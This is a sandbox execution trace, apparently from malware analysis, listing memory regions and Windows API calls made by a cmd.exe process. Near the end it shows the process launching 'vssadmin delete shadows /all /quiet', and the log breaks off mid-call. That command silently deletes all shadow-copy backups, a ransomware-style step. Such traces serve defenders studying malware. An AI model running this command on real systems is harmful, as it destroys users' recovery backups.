"private_0x00000000000c0000" filename = "" Region: id = 1114 start_va = 0x4a590000 end_va = 0x4a5e8fff monitored = 1 entry_point = 0x4a5990b4 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1115 start_va = 0x77830000 end_va = 0x779d8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1116 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1117 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1118 start_va = 0x7feffb50000 end_va = 0x7feffb50fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1119 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1120 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 1121 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 1122 start_va = 0x1c0000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1123 start_va = 0x77710000 end_va = 0x7782efff monitored = 0 entry_point = 0x77725340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1124 start_va = 0x7fefd910000 end_va = 0x7fefd97bfff monitored = 0 entry_point = 0x7fefd912780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1125 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1126 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1127 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1128 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1129 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1130 start_va = 0x7feff100000 end_va = 0x7feff19efff monitored = 0 entry_point = 0x7feff1025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1131 start_va = 0x7fef28d0000 end_va = 0x7fef28d7fff monitored = 0 entry_point = 0x7fef28d11a0 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 1132 start_va = 0x77610000 end_va = 0x77709fff monitored = 0 entry_point = 0x7762a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1133 start_va = 0x7feff1c0000 end_va = 0x7feff226fff monitored = 0 entry_point = 0x7feff1cb03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1134 start_va = 0x7feff350000 end_va = 0x7feff35dfff monitored = 0 entry_point = 0x7feff351080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1135 start_va = 0x7feff690000 end_va = 0x7feff758fff monitored = 0 entry_point = 0x7feff70a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1136 start_va = 0x1c0000 end_va = 0x2dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1137 start_va = 0x360000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 1138 start_va = 0x1c0000 end_va = 0x2bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1139 start_va = 0x2d0000 end_va = 0x2dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 1140 start_va = 0x2e0000 end_va = 0x308fff monitored = 0 entry_point = 0x2e1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1141 start_va = 0x460000 end_va = 0x5e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1142 start_va = 0x2e0000 end_va = 0x308fff monitored = 0 entry_point = 0x2e1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1143 start_va = 0x7feff400000 end_va = 0x7feff42dfff monitored = 0 entry_point = 0x7feff401010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1144 start_va = 0x7feff9d0000 end_va = 0x7feffad8fff monitored = 0 entry_point = 0x7feff9d1064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1145 start_va = 0x5f0000 end_va = 0x770fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 1146 start_va = 0x780000 end_va = 0x1b7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 1147 start_va = 0x2e0000 end_va = 0x2fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 1148 start_va = 0x2c0000 end_va = 0x2c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 1149 start_va = 0x300000 end_va = 0x300fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 1150 start_va = 0x1b80000 end_va = 0x1e4efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 21 os_tid = 0xf88 [0108.864] GetProcAddress (hModule=0x77710000, lpProcName="SetConsoleInputExeNameW") returned 0x77720c80 [0108.866] GetProcessHeap () returned 0x360000 [0108.866] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x4012) returned 0x37c630 [0108.866] GetProcessHeap () returned 0x360000 [0108.866] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x37c630 | out: hHeap=0x360000) returned 1 [0108.867] _wcsicmp (_String1="vssadmin", _String2=")") returned 77 [0108.867] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16 [0108.867] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16 [0108.867] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13 [0108.867] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13 [0108.867] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4 [0108.867] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4 [0108.867] GetProcessHeap () returned 0x360000 [0108.867] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0xb0) returned 0x379e10 [0108.867] GetProcessHeap () returned 0x360000 [0108.867] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x22) returned 0x374700 [0108.868] GetProcessHeap () returned 0x360000 [0108.868] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x4a) returned 0x3785c0 [0108.869] GetProcessHeap () returned 0x360000 [0108.869] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0xb0) returned 0x379ed0 [0108.870] _wcsicmp (_String1="wmic", _String2=")") returned 78 [0108.870] _wcsicmp (_String1="FOR", _String2="wmic") returned -17 [0108.870] _wcsicmp (_String1="FOR/?", _String2="wmic") returned -17 [0108.870] _wcsicmp (_String1="IF", _String2="wmic") returned -14 [0108.870] _wcsicmp (_String1="IF/?", _String2="wmic") returned -14 [0108.870] _wcsicmp (_String1="REM", _String2="wmic") returned -5 [0108.870] _wcsicmp (_String1="REM/?", _String2="wmic") returned -5 [0108.870] GetProcessHeap () returned 0x360000 [0108.870] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0xb0) returned 0x379f90 [0108.870] GetProcessHeap () returned 0x360000 [0108.870] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x1a) returned 0x374730 [0108.871] GetProcessHeap () returned 0x360000 [0108.871] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x36) returned 0x376790 [0108.872] GetConsoleTitleW (in: lpConsoleTitle=0x1bfaa0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0108.873] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0108.873] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0108.873] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0108.873] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0108.873] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0108.873] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0108.873] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0108.873] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0108.873] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0108.873] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0108.873] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0108.873] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0108.873] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0108.873] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0108.873] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0108.873] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0108.873] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0108.873] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0108.873] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0108.873] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0108.873] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0108.873] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0108.873] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0108.874] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0108.874] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0108.874] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0108.874] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0108.874] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0108.874] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0108.874] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0108.874] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0108.874] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0108.874] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0108.874] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0108.874] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0108.874] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0108.874] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0108.874] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0108.874] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0108.874] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0108.874] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0108.874] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0108.874] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0108.874] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0108.874] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0108.874] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0108.874] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0108.875] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0108.875] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0108.875] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0108.875] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0108.875] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0108.875] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0108.875] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0108.875] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0108.875] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0108.875] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0108.875] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0108.875] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0108.876] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0108.876] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0108.876] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0108.876] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0108.876] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0108.876] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0108.876] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0108.876] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0108.876] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0108.876] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0108.876] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0108.876] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0108.876] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0108.876] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0108.876] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0108.876] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0108.876] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0108.876] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0108.876] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0108.876] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0108.876] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0108.876] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0108.877] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0108.877] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0108.877] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0108.877] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0108.877] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0108.877] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0108.877] GetProcessHeap () returned 0x360000 [0108.877] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x218) returned 0x37a050 [0108.877] GetProcessHeap () returned 0x360000 [0108.877] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x5c) returned 0x37a270 [0108.878] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0108.878] GetProcessHeap () returned 0x360000 [0108.878] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x420) returned 0x361320 [0108.878] SetErrorMode (uMode=0x0) returned 0x0 [0108.878] SetErrorMode (uMode=0x1) returned 0x0 [0108.878] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x361330, lpFilePart=0x1bf330 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpFilePart=0x1bf330*="Roaming") returned 0x22 [0108.878] SetErrorMode (uMode=0x0) returned 0x1 [0108.879] GetProcessHeap () returned 0x360000 [0108.879] RtlReAllocateHeap (Heap=0x360000, Flags=0x0, Ptr=0x361320, Size=0x68) returned 0x361320 [0108.879] GetProcessHeap () returned 0x360000 [0108.879] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x361320) returned 0x68 [0108.879] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a5bf360, nSize=0x2000 | out: lpBuffer="") returned 0xc8 [0108.879] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0108.879] GetProcessHeap () returned 0x360000 [0108.879] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x1ec) returned 0x3613a0 [0108.879] GetProcessHeap () returned 0x360000 [0108.879] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x3c8) returned 0x3615a0 [0108.889] GetProcessHeap () returned 0x360000 [0108.889] RtlReAllocateHeap (Heap=0x360000, Flags=0x0, Ptr=0x3615a0, Size=0x1ee) returned 0x3615a0 [0108.889] GetProcessHeap () returned 0x360000 [0108.889] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x3615a0) returned 0x1ee [0108.889] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a5bf360, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0108.889] GetProcessHeap () returned 0x360000 [0108.890] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0xe8) returned 0x3617a0 [0108.890] GetProcessHeap () returned 0x360000 [0108.890] RtlReAllocateHeap (Heap=0x360000, Flags=0x0, Ptr=0x3617a0, Size=0x7e) returned 0x3617a0 [0108.890] GetProcessHeap () returned 0x360000 [0108.890] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x3617a0) returned 0x7e [0108.898] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0108.898] FindFirstFileExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\vssadmin.*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x1bf0a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1bf0a0) returned 0xffffffffffffffff [0108.898] GetLastError () returned 0x2 [0108.899] FindFirstFileExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\vssadmin" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\vssadmin"), fInfoLevelId=0x1, lpFindFileData=0x1bf0a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1bf0a0) returned 0xffffffffffffffff [0108.899] GetLastError () returned 0x2 [0108.899] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0108.899] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\vssadmin.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x1bf0a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1bf0a0) returned 0xffffffffffffffff [0108.902] GetLastError () returned 0x2 [0108.902] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\vssadmin" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\vssadmin"), fInfoLevelId=0x1, lpFindFileData=0x1bf0a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1bf0a0) returned 0xffffffffffffffff [0108.902] GetLastError () returned 0x2 [0108.902] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0108.902] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*" (normalized: "c:\\windows\\system32\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x1bf0a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1bf0a0) returned 0x37a2e0 [0108.903] GetProcessHeap () returned 0x360000 [0108.903] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x28) returned 0x374760 [0108.903] FindClose (in: hFindFile=0x37a2e0 | out: hFindFile=0x37a2e0) returned 1 [0108.903] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM" (normalized: "c:\\windows\\system32\\vssadmin.com"), fInfoLevelId=0x1, lpFindFileData=0x1bf0a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1bf0a0) returned 0xffffffffffffffff [0108.903] GetLastError () returned 0x2 [0108.903] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE" (normalized: "c:\\windows\\system32\\vssadmin.exe"), fInfoLevelId=0x1, lpFindFileData=0x1bf0a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1bf0a0) returned 0x37a2e0 [0108.904] GetProcessHeap () returned 0x360000 [0108.904] RtlReAllocateHeap (Heap=0x360000, Flags=0x0, Ptr=0x374760, Size=0x8) returned 0x37a340 [0108.904] FindClose (in: hFindFile=0x37a2e0 | out: hFindFile=0x37a2e0) returned 1 [0108.904] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0108.904] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0108.904] GetConsoleTitleW (in: lpConsoleTitle=0x1bf5f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0108.904] InitializeProcThreadAttributeList (in: lpAttributeList=0x1bf3a8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1bf368 | out: lpAttributeList=0x1bf3a8, lpSize=0x1bf368) returned 1 [0108.904] UpdateProcThreadAttribute (in: lpAttributeList=0x1bf3a8, dwFlags=0x0, Attribute=0x60001, lpValue=0x1bf358, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1bf3a8, lpPreviousValue=0x0) returned 1 [0108.904] GetStartupInfoW (in: lpStartupInfo=0x1bf4c0 | out: lpStartupInfo=0x1bf4c0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0108.904] GetProcessHeap () returned 0x360000 [0108.905] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x20) returned 0x374760 [0108.905] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0108.905] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0108.905] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0108.905] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0108.905] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0108.905] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0108.905] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0108.905] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0108.905] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0108.905] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0108.905] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0108.905] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0108.905] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0108.905] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0108.905] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0108.905] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0108.905] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0108.905] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0108.905] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0108.905] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0108.905] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0108.906] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0108.906] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0108.906] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0108.906] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0108.906] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0108.906] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0108.906] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0108.906] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0108.906] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0108.906] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0108.906] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0108.906] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0108.906] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0108.906] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0108.908] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0108.908] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0108.908] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0108.908] GetProcessHeap () returned 0x360000 [0108.908] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x374760 | out: hHeap=0x360000) returned 1 [0108.908] GetProcessHeap () returned 0x360000 [0108.908] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x12) returned 0x37a360 [0108.908] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0108.911] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin delete shadows /all /quiet ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpStartupInfo=0x1bf3e0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin delete shadows /all /quiet ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1bf390 | out: lpCommandLine="vssadmin delete shadows /all /quiet ", 